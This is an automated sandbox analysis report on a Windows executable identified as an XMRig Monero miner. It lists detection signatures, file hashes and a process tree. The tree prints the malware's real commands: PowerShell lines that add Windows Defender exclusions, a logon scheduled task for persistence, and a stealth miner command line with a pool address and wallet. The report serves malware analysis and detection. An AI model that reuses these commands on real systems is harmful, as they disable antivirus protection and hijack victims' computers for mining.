Overview

overview

10

Static

static

3

188a6bc8dd...b5.exe

windows7-x64

10

188a6bc8dd...b5.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 01:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe

  • Size

    37.2MB

  • MD5

    15753001204630c254b85fceadcb3027

  • SHA1

    ea16917f1cf19b86f53b61e032a010c607a7ed05

  • SHA256

    188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5

  • SHA512

    7dd7a7ed06139933f79ff5e298fbfa9b63f19e4c7881f55dd208261f4bf5793a9bd58de66dec60b495c40955d61c9182472840358d80ab30f73ef1ab4989d75b

  • SSDEEP

    786432:lzynVYtYYbKGk6ojijibkmr3x/Y25UQmxzgir:RYh6ouwPJX5URg

Score
10/10
xmrigdiscoveryexecutionminerupx

Malware Config

Signatures

  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 17 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe
    "C:\Users\Admin\AppData\Local\Temp\188a6bc8dd17cd7cda3b8ba3ce3ae9adb8d613f3dab9740e32c67c84ab3102b5.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:628
    • C:\Users\Admin\AppData\Local\Temp\sxmr.exe
      "C:\Users\Admin\AppData\Local\Temp\sxmr.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:584
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\sxmr.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3028
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2872
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
        • C:\Windows\System32\cmd.exe
          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3052
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3060
        • C:\Windows\System32\cmd.exe
          "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Users\Admin\AppData\Local\Temp\services64.exe
            C:\Users\Admin\AppData\Local\Temp\services64.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:592
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2180
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1360
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:112
              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                7⤵
                • Executes dropped EXE
                PID:1856
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "/sihost64"
                  8⤵
                    PID:1928
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=gulf.moneroocean.stream:10128 --user=44cYetZ659aFV3HZjALibNdHK44yBCckEb1qWMyRmw7QAhNLf7T6EvMW4p7kFA8hzQFXMK8aC1JEtGaG6zriSY1bQK4w5NH --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth
                  7⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1784
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Users\Admin\AppData\Local\Temp\Built.exe
          "C:\Users\Admin\AppData\Local\Temp\Built.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2940

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_MEI26602\python312.dll
      Filesize

      1.7MB

      MD5

      eb02b8268d6ea28db0ea71bfe24b15d6

      SHA1

      86f723fcc4583d7d2bd59ca2749d4b3952cd65a5

      SHA256

      80222651a93099a906be55044024d32e93b841c83554359d6e605d50d11e2e70

      SHA512

      693bbc3c896ad3c6044c832597f946c778e6c6192def3d662803e330209ec1c68d8d33bd82978279ae66b264a892a366183dcef9a3a777e0a6ee450a928268e2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\sxmr.exe
      Filesize

      29.8MB

      MD5

      8e9513fab03149898eae08bf8d3b780c

      SHA1

      ab3d6c4ae285e62365cab5f4fb75df69577df7c1

      SHA256

      d1fbc9fc1e7d9fd4b522e624ec518702450bffdf9828e67cc776368c3f5f6b0c

      SHA512

      afa1b1a4970d66208f80750cc7692243b601ae5062958288d9f6585b55056cfe9126f3cd9a74fe1f53defb3dfec94e7c1f7f03c64403dd1071fac515d4a646cd

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      Filesize

      31KB

      MD5

      0652d5d9657f657b2f0c52fc99196e51

      SHA1

      5235469dde99f0dfa335957d64c4c85b9e66b0c7

      SHA256

      6f6c6ece30d2b2873804e23ff5dc565fe40ad059b28eb1275841d3127f5c32b4

      SHA512

      c0de136f920d77de703390754ccda4f403a71d6fd10fd3f43d72e5e227a33e2d5240cc9d0fa1e73023b5c9ff23a1675937200aeeb25fb0da4d830b584eb77fb3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      5e264e24030084c2dc08e17b1ab36279

      SHA1

      02fd91612521c378801ca8b1f30bb4fc430b462c

      SHA256

      af03b988abd36af9dcd20802e4c6ba9b2f1927564e125ca95fefddbacda97547

      SHA512

      798591838491da32e2c97a951ba4c640c07ad5c336d4b711d320ef4c15b9f8a3213da0d2efe49f5db9365142f8711209b67af273044540da6a63a00316973707

      Download Submit

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      Download Submit

    • \Users\Admin\AppData\Local\Temp\Built.exe
      Filesize

      7.5MB

      MD5

      4d624674d6e526a7ef7507254c865176

      SHA1

      89d6d7cfbd15e3815615c4f39513690c877743c9

      SHA256

      127816ffa0bb93e974df4e6f4452258ec0879b7de879d9299a25254d892f7758

      SHA512

      a2dea9106f35b81617083797a36c74d66d2f42cc13b5ccf531f04fc48693ba5742cc0fd2035be430d59be850237e5f1e36be45270302872a29be8377f0de1ef3

      Download Submit

    • memory/1536-73-0x0000000002960000-0x0000000002968000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1536-72-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/1784-118-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-120-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-132-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-131-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-127-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-128-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-104-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-98-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-100-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-114-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-130-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-102-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-123-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-126-0x0000000000370000-0x0000000000390000-memory.dmp

      Filesize

      128KB

      Download

    • memory/1784-122-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1784-129-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-116-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-112-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-110-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-108-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-106-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1784-125-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

      Download

    • memory/1928-134-0x0000000000060000-0x0000000000066000-memory.dmp

      Filesize

      24KB

      Download

    • memory/1928-135-0x0000000000230000-0x0000000000236000-memory.dmp

      Filesize

      24KB

      Download

    • memory/2872-66-0x0000000001F80000-0x0000000001F88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2872-65-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2940-36-0x000007FEF6070000-0x000007FEF6735000-memory.dmp

      Filesize

      6.8MB

      Download

    • memory/2940-38-0x000007FEF6070000-0x000007FEF6735000-memory.dmp

      Filesize

      6.8MB

      Download

    • memory/3028-59-0x00000000000A0000-0x0000000001E5F000-memory.dmp

      Filesize

      29.7MB

      Download

    • memory/3028-60-0x00000000207F0000-0x00000000225AE000-memory.dmp

      Filesize

      29.7MB

      Download